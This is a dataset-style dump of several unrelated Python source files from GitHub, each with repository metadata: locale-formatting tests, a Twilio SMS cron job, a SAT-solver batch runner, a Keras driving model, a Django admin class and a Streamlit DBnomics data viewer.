s1 = format("%d", 123456789, 1)
assert s1 == '123,456,789', '%r != %r' % (val, s1)
assert val == atoi(s1), '%r != %r' % (val, atoi(s1))
# FLOAT
val = 123456789.14
s1 = str(val)
s2 = format("%.2f", val, 1)
assert s2 == '123,456,789.14', '%r != %r' % (val, s2)
assert val == atof(s1), '%r != %r' % (val, atof(s1))
#
@nose.with_setup(setup_num, tear_down_num)
def test_numeric():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_NUMERIC, lc_norm)
setlocale(loc)
# short
for what in (locale.ALT_DIGITS, locale.RADIXCHAR, locale.THOUSEP):
nl = nl_langinfo(what)
lo = locale.nl_langinfo(what)
assert nl == lo, '%s (%s): %r != %r' % (loc, lc_norm, nl, lo)
#
# for
#
@nose.with_setup(setup_num, tear_down_num)
def test_monetary():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_NUMERIC, lc_norm)
setlocale(loc)
# short
nl = locale.localeconv()
li = localeconv()
for k, v in nl.items():
assert v == li[k], '%s (%s): %s %r != %r' % (loc, lc_norm, k, v, li[k])
#
# for
#
@nose.with_setup(setup_tm, tear_down_tm)
def test_date_time_format():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_TIME, lc_norm)
setlocale(loc)
for what in (
locale.D_T_FMT, locale.D_FMT, locale.T_FMT, locale.T_FMT_AMPM,
):
nl = nl_langinfo(what)
lo = locale.nl_langinfo(what)
assert nl == lo, '%r != %r' % (nl, lo)
#
#
#
@nose.with_setup(setup_tm, tear_down_tm)
def test_day_names():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_TIME, lc_norm)
setlocale(loc)
for what in (
locale.DAY_1, locale.DAY_2, locale.DAY_3, locale.DAY_4, locale.DAY_5, locale.DAY_6, locale.DAY_7,
locale.ABDAY_1, locale.ABDAY_2, locale.ABDAY_3, locale.ABDAY_4, locale.ABDAY_5, locale.ABDAY_6, locale.ABDAY_7,
):
nl = nl_langinfo(what)
lo = locale.nl_langinfo(what)
assert nl == lo, '%r != %r' % (nl, lo)
#
#
#
@nose.with_setup(setup_tm, tear_down_tm)
def test_month_names():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_TIME, lc_norm)
setlocale(loc)
for what in (
locale.MON_1, locale.MON_2, locale.MON_3, locale.MON_4, locale.MON_5, locale.MON_6, locale.MON_7, locale.MON_8, locale.MON_9, locale.MON_10, locale.MON_11, locale.MON_12,
locale.ABMON_1, locale.ABMON_2, locale.ABMON_3, locale.ABMON_4, locale.ABMON_5, locale.ABMON_6, locale.ABMON_7, locale.ABMON_8, locale.ABMON_9, locale.ABMON_10, locale.ABMON_11, locale.ABMON_12,
):
nl = nl_langinfo(what)
lo = locale.nl_langinfo(what)
assert nl == lo, '%r != %r' % (nl, lo)
#
#
#
@nose.with_setup(setup_tm, tear_down_tm)
def test_era():
for loc in CANDIDATE_LOCALES:
lc_norm = _normalize(loc)
_set_locale(locale.LC_TIME, lc_norm)
setlocale(loc)
for what in (
locale.ERA, locale.ERA_D_T_FMT, locale.ERA_D_FMT,
):
nl = nl_langinfo(what)
lo = locale.nl_langinfo(what)
assert nl == lo, '%r != %r' % (nl, lo)
#
#
#
def test_sr_number_format():
setlocale('sr')
td = (
# w/o grouping
(("%f", 1024), '1024,000000'),
(("%f", 102), '102,000000'),
(("%f", -42), '-42,000000'),
(("%+f", -42), '-42,000000'),
(("%20.f", -42), ' -42'),
(("%+10.f", -4200), ' -4200'),
(("%-10.f", 4200),'4200 '),
# with grouping
(("%f", 1024, 1), '1.024,000000'),
(("%f", 102, 1), '102,000000'),
(("%f", -42, 1), '-42,000000'),
(("%+f", -42, 1), '-42,000000'),
(("%20.f", -42, 1), ' -42'),
(("%+10.f", -4200, 1), ' -4.200'),
(("%-10.f", 4200, 1),'4.200 '),
)
for args, res in td:
assert format(*args) == res, '%r != %r' % (format(*args), res)
#
# DJANGO FUNCTIONALITY
# FIXME: specific number and date/time tests
| shula/citytree | contrib/nesh/localization/test_localization.py | test_localization.py | py | 7,157 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.conf.settings.configure",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.conf.settings",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "locale.setlocale",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "lo... |
32967621302 | from arcana_app.models import Truck
from twilio.rest import Client
from datetime import date, timedelta
def my_scheduled_job():
'''
Background task with interval set in settings. Function send SMS when is information that MOT expires.
Function sends message one time when 20 days left to mot expiration.
'''
trucks = Truck.objects.all()
today = date.today()
for truck in trucks:
if (truck.expire_MOT - today) == timedelta(days=20):
client = Client(account_sid, auth_token)
message = client.messages.create(
body=f"{truck.color} {truck.brand} with reg numbers {truck.registration_number} has 20 days to MOT",
)
##########
print(message.sid)
print(truck.expire_MOT - date.today())
########## | KamilNurzynski/Arcana | arcana_app/cron.py | cron.py | py | 848 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "arcana_app.models.Truck.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "arcana_app.models.Truck.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "arcana_app.models.Truck",
"line_number": 12,
"usage_type": "name... |
26009605425 | import datetime
import os
import subprocess
import time
import dimacs
start = time.time()
solved = 0
hardest = {}
try:
for file in dimacs.satlib_problems:
file = os.path.join("C:\\satlib", file)
print(file)
dimacs.print_header(file)
expected = dimacs.get_expected(file)
cmd = "./ayane", file
t = time.time()
p = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding="utf-8"
)
t = time.time() - t
print("%.3f seconds" % t)
s = p.stdout
print(s)
code = p.returncode
if code:
raise Exception(code)
if s.startswith("sat"):
r = "sat"
elif s.startswith("unsat"):
r = "unsat"
else:
raise Exception()
dimacs.check(r, expected)
solved += 1
if t > hardest.get(r, (0, 0))[1]:
hardest[r] = file, t
except KeyboardInterrupt:
print()
print("Total time")
t = time.time() - start
print(datetime.timedelta(seconds=t))
print()
if hardest:
print("Hardest solved")
if "sat" in hardest:
print("sat\t%s\t%.3f" % hardest["sat"])
if "unsat" in hardest:
print("unsat\t%s\t%.3f" % hardest["unsat"])
print()
print(solved)
| russellw/ayane | script/batch_dimacs.py | batch_dimacs.py | py | 1,303 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "dimacs.satlib_problems",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line... |
29752162238 | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 02:22:23 2018
@author: RAJAT
"""
import numpy as np
from time import time
from keras.models import Sequential
from keras.layers import Dense, Dropout , Activation,Flatten,Convolution2D, MaxPooling2D ,AveragePooling2D
from keras.callbacks import TensorBoard
# This is where we create the model for training purpose
# 1. we create a function self_driving
# returns a model
# 2. we create a function to save
move_encode = {
'W':np.array([1,0,0,0,0]).reshape(1,5),
'S':np.array([0,1,0,0,0]).reshape(1,5),
'A':np.array([0,0,1,0,0]).reshape(1,5),
'D':np.array([0,0,0,1,0]).reshape(1,5),
'.':np.array([0,0,0,0,1]).reshape(1,5),
}
move_decode ={
0:'W',
1:'S',
2:'A',
3:'D',
4:'.'
}
def encode_movement(move):
try:
return move_encode[move[0]]
except (KeyError , IndexError) as e:
return move_encode['.']
def self_driving(shape):
model = Sequential()
model.add(Convolution2D(512 , kernel_size=(2,2), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
model.add(Convolution2D(128 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
model.add(Convolution2D(256 , kernel_size=(2,2), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
model.add(AveragePooling2D(pool_size=(2,2)))
model.add(Convolution2D(64 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
model.add(Convolution2D(128 , kernel_size=(2,2), strides=(2,2) , padding='valid' , activation='relu', input_shape=shape))
model.add(AveragePooling2D(pool_size=(2,2)))
model.add(Convolution2D(32 , kernel_size=(1,1), strides=(1,1) , padding='valid' , activation='relu', input_shape=shape))
model.add(Convolution2D(64 , kernel_size=(2,2), strides=(3,3) , padding='valid' , activation='relu', input_shape=shape))
model.add(MaxPooling2D(pool_size=(2,2)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(5, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
return model
def save_model(model,name):
model_json = model.to_json()
with open(name+".json", "w") as json_file:
json_file.write(model_json)
model.save_weights(name+".h5")
print("\n SAVED THE WEIGHTS AND MODEL !!!!")
def load_model_weights(name):
from keras.models import model_from_json
json_file = open(name+'.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.load_weights(name+".h5")
loaded_model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
return loaded_model
if __name__ == '__main__':
from datacollect import load_train_data
X_train , Y_train = load_train_data()
model = load_model_weights('v1_nfs_ai')
#model = self_driving(X_train[0].shape)
for i in range(100):
model.fit(X_train, Y_train,
batch_size=30,nb_epoch=1, verbose=1)
save_model(model , "v1_nfs_ai")
| rajatkb/STU-NET-Stupid-Neural-Net | edition 1 CNN= = = softmax/model.py | model.py | py | 3,722 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": ... |
34455433400 | # -*- coding: utf8 -*-
from django.contrib import admin
from models_app.models import Document
@admin.register(Document)
class DocumentAdmin(admin.ModelAdmin):
list_display = [
'id',
'name',
'file',
'position',
'task',
]
list_display_links = (
'id',
'name',
)
readonly_fields = ['id', 'created_at', 'updated_at']
ordering = ('id', 'position', 'task')
list_filter = ('position', 'task')
| Aplles/project_tracker | models_app/admin/document/resources.py | resources.py | py | 472 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.admin.ModelAdmin",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.admin",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.contrib.admin.register",
"line_number": 6,
"usage_type": "call"
},
{
... |
32226927177 | import streamlit as st
import requests
import json
from dbnomics import fetch_series
import pandas as pd
from pandas.api.types import (
is_categorical_dtype,
is_datetime64_any_dtype,
is_numeric_dtype,
)
import altair as alt
st.set_page_config(page_title="DB Nomics Marco Data Vizualizer", layout="wide")
state = st.session_state
if 'provider_code' not in state:
state['provider_code'] = ""
if 'provider_name' not in state:
state['provider_name'] = ""
if 'dataset_code' not in state:
state['dataset_code'] = ""
if 'dataset_name' not in state:
state['dataset_name'] = ""
@st.experimental_memo
def get_providers():
limts_providers = {"limit": "1000", "offset": "0"}
request_providers = requests.get("https://api.db.nomics.world/v22/providers",
params=limts_providers)
json_providers = json.loads(request_providers.text)
providers = json_providers["providers"]["docs"]
return [(provider["code"], provider["name"]) for provider in providers]
provider_details = get_providers()
selected_provider_name = st.selectbox(
"Select a **provider**",
[j for i, j in provider_details])
for item in provider_details:
if item[1] == selected_provider_name:
selected_provider_code = item[0]
break
def change_provider(selected_provider_name, selected_provider_code):
state['provider_name'] = selected_provider_name
state['provider_code'] = selected_provider_code
st.button("**Load datasets**", on_click=change_provider,
args=(selected_provider_name, selected_provider_code,))
@st.experimental_memo
def get_datasets(provider_code):
limts_datasets = {"limit": "500", "offset": "0"}
request_datasets = requests.get(
f"https://api.db.nomics.world/v22/datasets/{provider_code}",
params=limts_datasets)
json_datasets = json.loads(request_datasets.text)
datasets = json_datasets["datasets"]["docs"]
datasets_number = json_datasets["datasets"]["num_found"]
dataset_details = [(dataset["code"], dataset["name"], dataset["nb_series"],
dataset["nb_series"]) for dataset in datasets]
return dataset_details, datasets_number
if state['provider_code'] == selected_provider_code:
dataset_details, datasets_number = get_datasets(state['provider_code'])
if "dataset_details" not in globals():
dataset_details = []
selected_dataset_name = None
selected_dataset_code = None
else:
st.info(f"**Provider:** {state['provider_name']}"
f"**Datasets:** {datasets_number}"
f"**Link:** [DBNomics Provider Info]"
f"(https://db.nomics.world/{state['provider_code']})"
, icon="ℹ️")
if datasets_number > 50:
st.warning(f"This alpha version can only show the first 50 datasets "
f"of each provider. {state['provider_name']} "
f"has {datasets_number} datasets.")
selected_dataset_name = st.selectbox(
"Select a **dataset**",
[j for i, j, k, o in dataset_details])
for item in dataset_details:
if item[1] == selected_dataset_name:
selected_dataset_code = item[0]
selected_dataset_series = item[2]
selected_dataset_updated = item[3]
break
if dataset_details != []:
st.info(f"**Dataset Code:** {selected_dataset_code} "
f"**Series in Dataset:** {selected_dataset_series} "
f"**Last update:** {selected_dataset_updated} "
f"**Link:** [DBNomics Dataset Info]('https://db.nomics.world/"
f"{state['provider_code']}/"
f"{selected_dataset_code}')",
icon="ℹ️")
if selected_dataset_series > 2000:
st.warning("This dataset has more than 2000 series."
" Loading can take some time and might not be successful.")
@st.experimental_memo
def get_dataset_data(provider_code, dataset_code):
return fetch_series(provider_code, dataset_code, max_nb_series=10000)
def filter_dataframe(df: pd.DataFrame) -> pd.DataFrame:
"""
Adds a UI on top of a dataframe to let viewers filter columns
Args:
df (pd.DataFrame): Original dataframe
Returns:
pd.DataFrame: Filtered dataframe
"""
df = df.copy()
# Try to convert datetimes into a standard format (datetime, no timezone)
# for col in df.columns:
# if is_object_dtype(df[col]):
# try:
# df[col] = pd.to_datetime(df[col])
# except Exception:
# pass
# if is_datetime64_any_dtype(df[col]):
# df[col] = df[col].dt.tz_localize(None)
modification_container = st.container()
with modification_container:
to_filter_columns = st.multiselect("Filter dataframe on", df.columns)
for column in to_filter_columns:
left, right = st.columns((1, 20))
# Treat columns with < 10 unique values as categorical
if is_categorical_dtype(df[column]) or df[column].nunique() < 40:
user_cat_input = right.multiselect(
f"Values for {column}",
df[column].unique(),
default=list(df[column].unique()),
)
df = df[df[column].isin(user_cat_input)]
elif is_numeric_dtype(df[column]):
_min = float(df[column].min())
_max = float(df[column].max())
step = (_max - _min) / 100
user_num_input = right.slider(
f"Values for {column}",
min_value=_min,
max_value=_max,
value=(_min, _max),
step=step,
)
df = df[df[column].between(*user_num_input)]
elif is_datetime64_any_dtype(df[column]):
user_date_input = right.date_input(
f"Values for {column}",
value=(
df[column].min(),
df[column].max(),
),
)
if len(user_date_input) == 2:
user_date_input = tuple(map(pd.to_datetime, user_date_input))
start_date, end_date = user_date_input
df = df.loc[df[column].between(start_date, end_date)]
else:
user_text_input = right.text_input(
f"Substring or regex in {column}",
)
if user_text_input:
df = df[df[column].astype(str).str.contains(user_text_input)]
return df
def get_data(provider_code, dataset_code):
df = get_dataset_data(provider_code, dataset_code)
return filter_dataframe(df)
def change_dataset(selected_dataset_name, selected_dataset_code):
state['dataset_name'] = selected_dataset_name
state['dataset_code'] = selected_dataset_code
st.button("**Load data**",
on_click=change_dataset,
args=(selected_dataset_name,
selected_dataset_code,))
if state['dataset_code'] != "":
data = get_data(state['provider_code'], state['dataset_code'])
st.dataframe(data)
brush = alt.selection(type='interval', encodings=['x'])
selection = alt.selection_multi(fields=['series_code'], bind='legend')
upper = alt.Chart(data).mark_line().encode(
x = alt.X('period:T', scale=alt.Scale(domain=brush)),
y = 'value:Q',
color = "series_code:N",
opacity=alt.condition(selection, alt.value(1), alt.value(0.2))
).properties(
width=1000,
height=300,
).add_selection(
selection
)
lower = alt.Chart(data).mark_area().encode(
x = 'period:T',
y = 'max(value):Q'
).properties(
width=1000,
height=100,
).add_selection(brush)
chart = upper & lower
tab1, tab2 = st.tabs(["Chart 1", "Chart 2"])
with tab1:
st.altair_chart(chart, theme="streamlit", use_container_width=True)
with tab2:
st.write("Test")
| Silvan-Fischer/MacroDataViz | MarcoDataViz.py | MarcoDataViz.py | py | 8,039 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "streamlit.set_page_config",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "streamlit.session_state",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "j... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.